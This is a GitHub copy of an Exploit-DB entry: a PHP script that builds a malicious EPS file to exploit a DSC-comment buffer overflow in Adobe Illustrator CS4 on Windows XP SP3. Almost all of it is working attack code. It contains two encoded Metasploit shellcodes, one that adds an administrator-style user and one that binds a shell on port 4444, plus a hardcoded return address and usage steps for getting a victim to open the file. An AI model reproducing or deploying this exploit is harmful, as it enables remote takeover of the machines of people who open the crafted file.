forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy path10281.php
More file actions
executable file
·151 lines (143 loc) · 9.17 KB
/
Copy path10281.php
File metadata and controls
executable file
·151 lines (143 loc) · 9.17 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
<?php
/*
Adobe Illustrator CS4 (V14.0.0) Encapsulated Postscript (.eps)
overlong DSC Comment Buffer Overflow Exploit
by Nine:Situations:Group::pyrokinesis
site: http://retrogod.altervista.org/
An overlong string as DSC comment (more than 42000 bytes)
results in a direct EIP overwrite.
Exception is first-chance so the program will never crash.
At the moment of the redirection EAX and ESI are user-controlled.
This portion of the buffer begins with '%' (it is the next DSC
comment) but as you can see the resulting pattern is
nop-equivalent.
Tested and working against xp sp3
change the call esi if you need, must be alphabetic
I used a "call esi" from comctl32.dll on xp sp3,
change if needed.
Usage: php 9sg_illu.php
then double-click on the resulting 9sg.eps file
it will bind a shell on port 4444
change the shellcode for your needs even.
*/
# windows/adduser - 446 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, USER=adobe, PASS=kills
$_scode_i = "\xda\xc9\xd9\x74\x24\xf4\x59\x49\x49\x49\x49\x49\x49\x49" .
"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" .
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42" .
"\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75" .
"\x4a\x49\x4b\x4c\x4a\x48\x47\x34\x43\x30\x43\x30\x45\x50" .
"\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55\x43\x48" .
"\x45\x51\x4a\x4f\x4c\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f" .
"\x51\x30\x45\x51\x4a\x4b\x47\x39\x4c\x4b\x50\x34\x4c\x4b" .
"\x43\x31\x4a\x4e\x50\x31\x49\x50\x4a\x39\x4e\x4c\x4d\x54" .
"\x49\x50\x44\x34\x45\x57\x49\x51\x48\x4a\x44\x4d\x43\x31" .
"\x49\x52\x4a\x4b\x4a\x54\x47\x4b\x46\x34\x47\x54\x43\x34" .
"\x43\x45\x4a\x45\x4c\x4b\x51\x4f\x47\x54\x43\x31\x4a\x4b" .
"\x45\x36\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c" .
"\x45\x51\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x43\x31\x4a\x4b" .
"\x4d\x59\x51\x4c\x47\x54\x44\x44\x48\x43\x51\x4f\x50\x31" .
"\x4b\x46\x43\x50\x46\x36\x45\x34\x4c\x4b\x47\x36\x50\x30" .
"\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c\x4e\x4d" .
"\x4c\x4b\x42\x48\x43\x38\x4b\x39\x4a\x58\x4c\x43\x49\x50" .
"\x42\x4a\x46\x30\x42\x48\x4c\x30\x4d\x5a\x44\x44\x51\x4f" .
"\x45\x38\x4d\x48\x4b\x4e\x4c\x4a\x44\x4e\x51\x47\x4b\x4f" .
"\x4d\x37\x42\x43\x42\x4d\x42\x44\x46\x4e\x45\x35\x43\x48" .
"\x42\x45\x51\x30\x46\x4f\x45\x33\x47\x50\x42\x4e\x42\x45" .
"\x42\x54\x51\x30\x43\x45\x43\x43\x45\x35\x43\x42\x51\x30" .
"\x45\x31\x45\x34\x42\x4f\x42\x42\x43\x55\x47\x50\x42\x4b" .
"\x45\x39\x42\x4c\x42\x4c\x42\x53\x51\x30\x46\x4f\x51\x51" .
"\x47\x34\x50\x44\x51\x30\x47\x56\x51\x36\x51\x30\x42\x4e" .
"\x42\x45\x44\x34\x47\x50\x42\x4c\x42\x4f\x42\x43\x45\x31" .
"\x42\x4c\x43\x57\x43\x42\x42\x4f\x44\x35\x44\x30\x47\x50" .
"\x47\x31\x42\x44\x42\x4d\x42\x49\x42\x4e\x45\x39\x42\x53" .
"\x43\x44\x42\x52\x45\x31\x43\x44\x42\x4f\x44\x32\x44\x33" .
"\x51\x30\x45\x31\x45\x34\x42\x4f\x43\x52\x42\x45\x47\x50" .
"\x46\x4f\x47\x31\x47\x34\x51\x54\x45\x50\x41\x41";
# windows/shell_bind_tcp - 696 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444, RHOST=
$_scode_ii = "\x89\xe5\xda\xd0\xd9\x75\xf4\x5e\x56\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x4b\x4c\x43\x5a\x4a\x4b\x50\x4d\x4d\x38" .
"\x4b\x49\x4b\x4f\x4b\x4f\x4b\x4f\x45\x30\x4c\x4b\x42\x4c" .
"\x46\x44\x51\x34\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c" .
"\x43\x35\x43\x48\x43\x31\x4a\x4f\x4c\x4b\x50\x4f\x42\x38" .
"\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a\x4b\x51\x59\x4c\x4b" .
"\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49\x50\x4a\x39" .
"\x4e\x4c\x4d\x54\x49\x50\x43\x44\x45\x57\x49\x51\x49\x5a" .
"\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47\x4b\x50\x54" .
"\x51\x34\x46\x48\x43\x45\x4b\x55\x4c\x4b\x51\x4f\x47\x54" .
"\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b" .
"\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x45\x53\x46\x4c\x4c\x4b" .
"\x4b\x39\x42\x4c\x47\x54\x45\x4c\x45\x31\x48\x43\x46\x51" .
"\x49\x4b\x45\x34\x4c\x4b\x50\x43\x50\x30\x4c\x4b\x51\x50" .
"\x44\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x51\x50" .
"\x43\x38\x51\x4e\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c" .
"\x50\x50\x4b\x4f\x48\x56\x45\x36\x50\x53\x43\x56\x45\x38" .
"\x50\x33\x46\x52\x45\x38\x44\x37\x43\x43\x47\x42\x51\x4f" .
"\x51\x44\x4b\x4f\x4e\x30\x45\x38\x48\x4b\x4a\x4d\x4b\x4c" .
"\x47\x4b\x50\x50\x4b\x4f\x49\x46\x51\x4f\x4c\x49\x4a\x45" .
"\x45\x36\x4b\x31\x4a\x4d\x43\x38\x43\x32\x51\x45\x42\x4a" .
"\x45\x52\x4b\x4f\x48\x50\x45\x38\x4e\x39\x44\x49\x4b\x45" .
"\x4e\x4d\x46\x37\x4b\x4f\x48\x56\x50\x53\x46\x33\x51\x43" .
"\x51\x43\x46\x33\x51\x53\x46\x33\x51\x53\x46\x33\x4b\x4f" .
"\x4e\x30\x45\x36\x45\x38\x42\x31\x51\x4c\x45\x36\x46\x33" .
"\x4b\x39\x4d\x31\x4a\x35\x42\x48\x4e\x44\x44\x5a\x42\x50" .
"\x49\x57\x51\x47\x4b\x4f\x49\x46\x43\x5a\x44\x50\x50\x51" .
"\x51\x45\x4b\x4f\x48\x50\x42\x48\x49\x34\x4e\x4d\x46\x4e" .
"\x4d\x39\x51\x47\x4b\x4f\x48\x56\x51\x43\x51\x45\x4b\x4f" .
"\x48\x50\x42\x48\x4d\x35\x51\x59\x4b\x36\x51\x59\x50\x57" .
"\x4b\x4f\x4e\x36\x46\x30\x50\x54\x46\x34\x51\x45\x4b\x4f" .
"\x4e\x30\x4c\x53\x45\x38\x4d\x37\x43\x49\x48\x46\x44\x39" .
"\x50\x57\x4b\x4f\x4e\x36\x46\x35\x4b\x4f\x4e\x30\x43\x56" .
"\x42\x4a\x43\x54\x42\x46\x43\x58\x45\x33\x42\x4d\x4d\x59" .
"\x4d\x35\x43\x5a\x46\x30\x51\x49\x47\x59\x48\x4c\x4b\x39" .
"\x4d\x37\x43\x5a\x50\x44\x4d\x59\x4b\x52\x50\x31\x49\x50" .
"\x4c\x33\x4e\x4a\x4b\x4e\x47\x32\x46\x4d\x4b\x4e\x47\x32" .
"\x46\x4c\x4c\x53\x4c\x4d\x43\x4a\x46\x58\x4e\x4b\x4e\x4b" .
"\x4e\x4b\x43\x58\x42\x52\x4b\x4e\x48\x33\x44\x56\x4b\x4f" .
"\x44\x35\x47\x34\x4b\x4f\x48\x56\x51\x4b\x51\x47\x46\x32" .
"\x46\x31\x50\x51\x50\x51\x42\x4a\x45\x51\x50\x51\x50\x51" .
"\x51\x45\x50\x51\x4b\x4f\x4e\x30\x42\x48\x4e\x4d\x49\x49" .
"\x43\x35\x48\x4e\x51\x43\x4b\x4f\x49\x46\x43\x5a\x4b\x4f" .
"\x4b\x4f\x50\x37\x4b\x4f\x4e\x30\x4c\x4b\x46\x37\x4b\x4c" .
"\x4d\x53\x48\x44\x45\x34\x4b\x4f\x4e\x36\x50\x52\x4b\x4f" .
"\x4e\x30\x42\x48\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x50\x53" .
"\x4b\x4f\x4e\x36\x4b\x4f\x48\x50\x41\x41";
$_eip = "\x57\x6b\x41\x77"; //0x77416b57 alphabetic call esi, comctl32.dll
$_boom = "\xc5\xd0\xd3\xc6\x20\x00\x00\x00\x05\xc8\x04\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00%\xc8\x04\x00\xb5I\x01\x00\xff".
"\xff\x00\x00".
"%!PS-Adobe-3.1\x20EPSF-3.0\r\n".
"%ADO_DSC_Encoding:\x20Windows\x20Roman\r\n".
"%".
str_repeat("A", 41699).
$_eip.
str_repeat("A", 2291).
"%Title:\x20Untitled-1.eps\r\n".
"%AAAAAAAA". // we jump here, nop-equivalent
$_scode_ii.
": A\r\n".
"%%For:\x20alias\r\n".
"%%CreationDate:\x2011/27/2009\r\n".
"%%BoundingBox:\x200\x200\x20227\x20171\r\n".
"%%HiResBoundingBox:\x200\x200\x20226.5044\x20170.3165\r\n".
"%%CropBox:\x200\x200\x20226.5044\x20170.3165\r\n".
"%%LanguageLevel:\x202\r\n".
"%%DocumentData:\x20Clean7Bit\r\n".
"%ADOBeginClientInjection:\x20DocumentHeader\x20\"AI11EPS\"\r\n".
"%%AI8_CreatorVersion:\x2014.0.0\r".
"%AI9_PrintingDataBegin\r".
"%ADO_BuildNumber:\x20Adobe\x20Illustrator(R)\x2014.0.0\x20x367\x20R\x20agm\x204.4890\x20ct\x205.1541\r".
"%ADO_ContainsXMP:\x20MainFirst\r".
"%AI7_Thumbnail:\x20128\x2096\x208\r".
"%%BeginData:\x204096\x20Hex\x20Bytes\r".
"%0000330000660000990000CC0033000033330033660033990033CC0033FF\r\n";
file_put_contents("9sg.eps", $_boom);
?>